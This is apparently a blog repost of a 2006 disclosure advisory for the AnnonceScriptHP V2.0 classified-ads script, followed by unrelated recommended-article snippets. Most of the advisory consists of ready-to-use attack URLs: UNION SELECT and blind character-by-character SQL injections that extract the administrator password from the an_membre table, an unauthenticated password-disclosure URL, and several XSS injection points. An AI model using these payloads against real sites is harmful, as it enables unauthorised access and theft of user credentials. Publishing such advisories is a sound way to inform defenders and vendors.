annonce.php,CVE-2006-6480 CVE-2006-6479 CVE-2006-6478 AnnonceScriptHP V2.0 Multiple Vulnerabilitie...

最新推荐文章于 2021-03-24 18:00:13 发布
最新推荐文章于 2021-03-24 18:00:13 发布
阅读量223 收藏
点赞数
文章标签: annonce.php

AnnonceScriptHP V2.0

--------------------

Vendor site: http://www.scripthp.com/

Product: AnnonceScriptHP V2.0

Vulnerability: XSS & SQL Injection Vulnerability

Credits: Mr_KaLiMaN

Reported to Vendor: 02/12/06

Public disclosure: 09/12/06

Description:

------------

Password disclosure (all members):

http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.ph

p?idmembre=1 (1 for admin etc...)

SQL Injection Vulnerability:

http://[victim]/[script_annonce_path]/email.php?id=[SQL INJECTION]

http://[victim]/[script_annonce_path]/email.php?id=-1 UNION SELECT null,passe,pseudo FROM an_membre WHERE idmembre=1#

http://[victim]/[script_annonce_path]/voirannonce.php?no=[SQL INJECTION]

http://[victim]/[script_annonce_path]/voirannonce.php?no=1 AND ORD(SUBSTRING((SELECT passe FROM an_membre WHERE idmembre=1),1,1))=98#

http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.ph

p?idmembre=[SQL INJECTION]

http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.ph

p?idmembre=-1 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu

ll,null,null,null FROM etc...#

http://[victim]/[script_annonce_path]/admin/admin_annonce/okvalannonce.p

hp?idannonce=[SQL INJECTION]

http://[victim]/[script_annonce_path]/admin/admin_annonce/okvalannonce.p

hp?idannonce=1%20UNION%20SELECT%20null,null,null,null,null,null,null,nul

l,null,null,null,null#

http://[victim]/[script_annonce_path]/admin/admin_annonce/changeannonce.

php?idannonce=[SQL INJECTION]

http://[victim]/[script_annonce_path]/admin/admin_annonce/changeannonce.

php?idannonce=1 AND ORD(SUBSTRING((SELECT passe FROM an_membre WHERE idmembre=1),1,1))=98#

XSS :

http://[victim]/[script_annonce_path]/erreurinscription.php?email=[XSS]

http://[victim]/[script_annonce_path]/Templates/admin.dwt.php?email=[XSS

]

http://[victim]/[script_annonce_path]/Templates/commun.dwt.php?email=[XS

S]

http://[victim]/[script_annonce_path]/Templates/membre.dwt.php?email=[XS

S]

http://[victim]/[script_annonce_path]/admin/admin_config/Aide.php?email=

[XSS]

里灰啊
关注
使用Acunetix Web Vulnerability Scanner扫描漏洞解决方法(积累)
qq_27942899的博客
07-10 3439
1、Apache JServ protocol service 注释掉tomcat的server.xml <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>2、Slow HTTP Denial of Service Attack将tomcat的server.xml 的<Connector URIEncod...
untoitpourcaramel:#UnToitPourCaramel-在Trello面板中汇总房地产广告的工具
04-28
#A焦糖屋顶 该程序受启发,该程序从Leboncoin,Logic Immo,PaP和SeLoger中检索房地产广告,以将其汇总到Trello板中。 先决条件 的Python 3 () 逆向工程过程 ... - annonce : - rep.xml / rep.json : Corps
什么是wlan wlan和wifi有什么区别 详细出处参考:http://www.jb51.net/network/64797.html
焦着未来的女汪汪
06-11 1399
点评:很多人在上网时就会发现家里用的电脑无线上网是WLAN,而手机或是平板电脑上网又叫WIFI。都是一样的无线上网,怎么会有二个不同的名字,那么wlan和wifi的意思是什么呢? 详细出处参考:http://www.jb51.net/network/64797.html
web服务器的一些漏洞处理
wurangy050的专栏
02-04 6639
我的服务器经常被入侵该设置的设置了 禁用服务  禁用端口  权限 我只开了俩高管账号 其他全部禁用  默认共享除了IPC$删除不了 其他全删了IIS装了 后来把IIS服务都禁用了 现在用的阿帕奇的但是看日志总有人通过IIS入侵我  总有通过主机名$ 访问的下面是我用Xscan扫的结果www (80/tcp) 开放服务"WEB"服务运行于该端口BANNER信息 : HTTP/1.1 200 OK D
Apache Tomcat information disclosure vulnerability
cnbird's blog
01-16 1120
CVE-2010-1157: Apache Tomcat information disclosure vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 6.0.0 to 6.0.26 - - Tomcat 5.5.0 to 5.5.
annonce.php,ogame_V1.4 ogame 最新版 - 下载 - 搜珍网
weixin_31940835的博客
03-24 305
add_declare.phpadmin/admin/activeplanet.phpadmin/add_fleet.phpadmin/add_money.phpadmin/add_moon.phpadmin/autounban.phpadmin/banned.phpadmin/changelog.phpadmin/chat.phpadmin/credit.phpadmin/declare_lis...
annonce.php,AnnoncesV 'Annonce.PHP'PHP远程文件包含漏洞
weixin_36036271的博客
03-24 81
来源: BUGTRAQ名称: 20060905 [Kurdish Security # 26 ] AnnonceV News Script Remote Command Vulnerability链接:http://www.securityfocus.com/archive/1/archive/1/445199/100/0/threaded来源: MISC链接:http://kurdishsecu...
annonce.php,PHP: PHP 4.3.9 Release Announcement
weixin_28889765的博客
03-24 229
Annonce de publication de PHP 4.3.9L'équipe de développement PHP a le plaisir de vous annoncerla publication de PHP 4.3.9. C'est une versionde maintenance, destinée à corriger une cinquantaine de bogu...
annonce.php,php mysql:如何避免在一个类中的多个数据库连接?
weixin_42363662的博客
03-24 68
require("Annonce.php");$annonce = new Annonce();$annonce->id=1;$annonce->delete();?>我Annonce.php是!require("DB.php");class Annonce extends DB {}?>最后DB是:$db = new PDO('mysql:host=localhost;d...
annonce.php,php mysql:如何避免在一個類中的多個數據庫連接?
weixin_32498069的博客
03-24 37
require("Annonce.php");$annonce = new Annonce();$annonce->id=1;$annonce->delete();?>我Annonce.php是!require("DB.php");class Annonce extends DB {}?>最後DB是:$db = new PDO('mysql:host=localhost;d...
serveur-discord:不合组织的Godot Engine法语
03-02
独特的Annonce lesévènements。 è 内容不简单的消息列表和服务注释 职员 戈代特发动机法语频道dédiéau Staff 沙龙 描述 Accueil Nononce les nouveaux进阶自动机 Accueil 不和谐的实用工具 讨论 讨论区d...
Annonce Ephemeriia Gaming-crx插件
04-02
"Annonce Ephemeriia Gaming-crx插件"是一款专为法语用户设计的游戏相关浏览器扩展,它提供了实时的游戏更新和社区动态提醒功能。这款插件的独特之处在于,即便用户并未直接浏览Twitch或其他游戏直播平台,或者不在...
JeVendsPourVous Annonce +-crx插件
04-04
【JeVendsPourVous Annonce +-crx插件】是一款专为法语用户设计的浏览器扩展程序,旨在提供一种方便的在线销售和购物辅助工具。这款插件的主要目标是帮助小型企业和个人更有效地管理和发布他们的销售广告,提高网上...
Projet-Annonces:N层架构
06-17
N层架构项目: ### TSE 公告 - 团队 #01 ...│ ├── annonce.sql (copie de la structure de la BDD) ├── Admin │ ├── JS (script propres à la section admin) │ ├── CSS (styles propres
Python基于机器学习的金融大数据风控建模实战源码+数据+pkl模型文件.zip
最新发布
10-10
Python基于机器学习的金融大数据风控建模实战源码+数据+pkl模型文件.zip
springcloud
10-10
springcloud
Java项目: 基于SpringBoot+mybatis+maven+vue+mysql在线教育系统(含源码+数据库+毕业论文)
10-10
一、项目简介 包含:项目源码、数据库脚本等,该项目附带全部源码可作为毕设使用。 项目都经过严格调试,eclipse或者idea 确保可以运行! 该系统功能完善、界面美观、操作简单 二、技术实现 jdk版本:1.8 及以上 ide工具:IDEA或者eclipse 数据库: mysql5.5及以上 后端:spring+springboot+mybatis+maven+mysql 前端: vue , css,js , elementui 三、系统功能 1、系统角色主要包括:管理员、用户、讲师 2、系统功能 后台主要功能包括: 首页 个人中心 修改密码 个人信息 用户管理 讲师管理 普通管理员管理 课程管理员管理 课程管理 课程分类管理 教师管理 名师管理 系统管理 订单管理 前台功能包括: 用户登录 用户注册 首页 课程信息推荐 课程详情 点我收藏 添加到购物车 立即购买 发表评论 教师信息推荐 个人中心 我的收藏 余额充值 后台管理 购物车等功能 详见 https://flypeppa.blog.csdn.net/article/details/142827942
纸板码垛程序,码垛动画仿真,采用博图v16编程,西门子S7-1200码垛程序,仿真效果如图所示,可以实现纸板 纸箱的动态码垛,为
10-10
纸板码垛程序,码垛动画仿真,采用博图v16编程,西门子S7-1200码垛程序,仿真效果如图所示,可以实现纸板 纸箱的动态码垛,为PLC程序+电路图
Analyse un chapitre clé du roman Chéri de Colette
04-01
Cependant, Léa annonce à Chéri qu'elle a décidé de mettre fin à leur relation qui a duré six ans. Cette nouvelle bouleverse Chéri qui ne peut pas imaginer sa vie sans Léa. Léa explique à ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值